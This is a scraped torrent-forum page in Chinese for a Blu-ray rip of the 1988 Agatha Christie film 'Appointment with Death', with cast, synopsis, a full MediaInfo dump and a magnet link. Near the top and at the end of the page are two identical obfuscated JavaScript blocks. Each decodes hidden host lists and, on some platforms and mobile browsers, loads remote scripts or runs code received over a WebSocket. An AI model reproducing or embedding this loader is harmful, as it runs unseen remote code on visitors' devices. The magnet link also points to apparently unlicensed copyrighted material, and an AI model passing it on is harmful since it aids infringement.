死亡约会[中文字幕].Appointment.with.Death.1988.1080p.GER.BluRay.x265.10bit.FLAC.MNHD 10.36GB

版主小s 1月前 237

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 死亡约会 / 死海杀人事件

◎片 名 Appointment with Death

◎年 代 1988

◎产 地 美国

◎类 别 悬疑 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1988-04-15(美国)

◎IMDb链接 https://www.imdb.com/title/tt0094669/

◎豆瓣评分 7.0/10 (1208人评价)

◎豆瓣链接 https://movie.douban.com/subject/2040149/

◎片 长 108分钟

◎导 演 迈克尔·温纳 Michael Winner (id:1041329)

◎编 剧 阿加莎·克里斯蒂 Agatha Christie (id:1050010)

安东尼·沙弗尼 Anthony Shaffer (id:1045430)

迈克尔·温纳 Michael Winner (id:1041329)

◎演 员 彼得·乌斯蒂诺夫 Peter Ustinov (id:1002761)

劳伦·白考尔 Lauren Bacall (id:1049581)

凯丽·费雪 Carrie Fisher (id:1027813)

约翰·吉尔古德 John Gielgud (id:1000249)

派珀·劳瑞 Piper Laurie (id:1007044)

海莉·米尔斯 Hayley Mills (id:1000110)

詹妮·西格芙 Jenny Seagrove (id:1146554)

大卫·索尔 David Soul (id:1049814)

尼古拉斯·格斯特 Nicholas Guest (id:1100199)

约翰·特莱斯基 John Terlesky (id:1019217)

艾梅伯·贝泽 Amber Bezer (id:1407872)

迈克尔·萨恩 Michael Sarne (id:1025441)

迈克尔·克雷格 Michael Craig (id:1007168)

Dan Muggia Dan Muggia (id:1127465)

阿里扎·本-莫哈 Aliza Ben-Moha (id:1356175)

Yoram Globus Yoram Globus (id:1284987)

David Gurfinkel David Gurfinkel (id:1276551)

Avishay Avivi Avishay Avivi (id:1277603)

John Blezard John Blezard (id:1278799)

John Bloomfield John Bloomfield (id:1278822)

Pat Hay Pat Hay (id:1286260)

◎标 签 阿加莎·克里斯蒂 / 波洛 / 推理 / 悬疑 / 侦探 / 彼得·乌斯蒂诺斯 / 英国 / 1988

◎简 介

本片是著名影星彼得·乌斯蒂诺夫第六次扮演神探波洛,原著创作于1938年,与克里斯蒂的另外两部作品《阳光下的罪恶》、《加勒比海谋杀案》组成了别具风情的“海岛谋杀三部曲”,书中讲述一位女暴君被谋杀,而她的家人个个都有杀人嫌疑,最终大侦探波洛通过抽丝剥茧的缜密推理找出了真凶。值得一提的是亨弗莱·鲍嘉的妻子、好莱坞著名影星劳伦·巴考尔应邀在片中扮演了一位女富翁,对破案起到了关键作用。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 52747910337921017813444555215616034205 (0x27AEE0C4C355B04392E2E27E800B459D)

  4. Complete name : Appointment.with.Death.1988.1[email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.4 GiB

  8. Duration : 1 h 42 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 14.4 Mb/s

  11. Movie name : Appointm[email protected]BBQDDQ.COM

  12. Encoded date : UTC 2021-10-31 11:58:28

  13. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  14. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  15. Cover : Yes

  16. Attachments : cover.jpg


  17. Video

  18. ID : 1

  19. Format : HEVC

  20. Format/Info : High Efficiency Video Coding

  21. Format profile : Main [email protected]@High

  22. Codec ID : V_MPEGH/ISO/HEVC

  23. Duration : 1 h 42 min

  24. Bit rate : 14.1 Mb/s

  25. Width : 1 914 pixels

  26. Height : 1 040 pixels

  27. Display aspect ratio : 1.85:1

  28. Frame rate mode : Constant

  29. Frame rate : 23.976 (24000/1001/53354) FPS

  30. Color space : YUV

  31. Chroma subsampling : 4:2:0

  32. Bit depth : 10 bits

  33. Bits/(Pixel*Frame) : 0.295

  34. Stream size : 10.1 GiB (98%)

  35. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit

  36. Encoding settings : rc=crf / crf=21.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / no-lossless / no-cu-lossless / aq-mode=1 / aq-strength=1.00 / cbqpoffs=-2 / crqpoffs=-2 / ipratio=1.30 / pbratio=1.20 / psy-rd=1.50 / psy-rdoq=1.00 / deblock=-3:-3 / ref=6 / limit-refs=0 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=1 / max-keyint=250 / rc-lookahead=100 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=32 / min-cu-size=8 / me=3 / subme=7 / merange=57 / rdoq-level=2 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / no-cutree / no-sao / no-rect / no-amp / no-open-gop / wpp / pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / qg-size=8 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=12 / log-level=2 / input-csp=1 / input-res=1914x1040 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / no-aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / tskip / max-merge=5 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.709

  41. Transfer characteristics : BT.709

  42. Matrix coefficients : BT.709


  43. Audio

  44. ID : 2

  45. Format : FLAC

  46. Format/Info : Free Lossless Audio Codec

  47. Codec ID : A_FLAC

  48. Duration : 1 h 42 min

  49. Bit rate mode : Variable

  50. Bit rate : 304 kb/s

  51. Channel(s) : 2 channels

  52. Channel layout : L R

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 11.719 FPS (4096 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 224 MiB (2%)

  58. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4611 (0x1203)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 39 min

  70. Bit rate : 36.3 kb/s

  71. Count of elements : 2876

  72. Stream size : 25.7 MiB (0%)

  73. Title : CHS

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4612 (0x1204)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 39 min

  86. Bit rate : 37.4 kb/s

  87. Count of elements : 2876

  88. Stream size : 26.5 MiB (0%)

  89. Title : CHT

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Menu

  95. 00:00:00.000 : Chapter 01

  96. 00:04:47.954 : Chapter 02

  97. 00:18:10.714 : Chapter 03

  98. 00:24:54.451 : Chapter 04

  99. 00:33:45.314 : Chapter 05

  100. 00:42:21.956 : Chapter 06

  101. 00:50:36.116 : Chapter 07

  102. 00:58:56.741 : Chapter 08

  103. 01:07:19.869 : Chapter 09

  104. 01:16:40.220 : Chapter 10

  105. 01:24:45.789 : Chapter 11

  106. 01:33:13.754 : Chapter 12


TAGS 惊悚 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:858BBCE14794BA6BFF7EFB450BB238DE45E0C89F

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};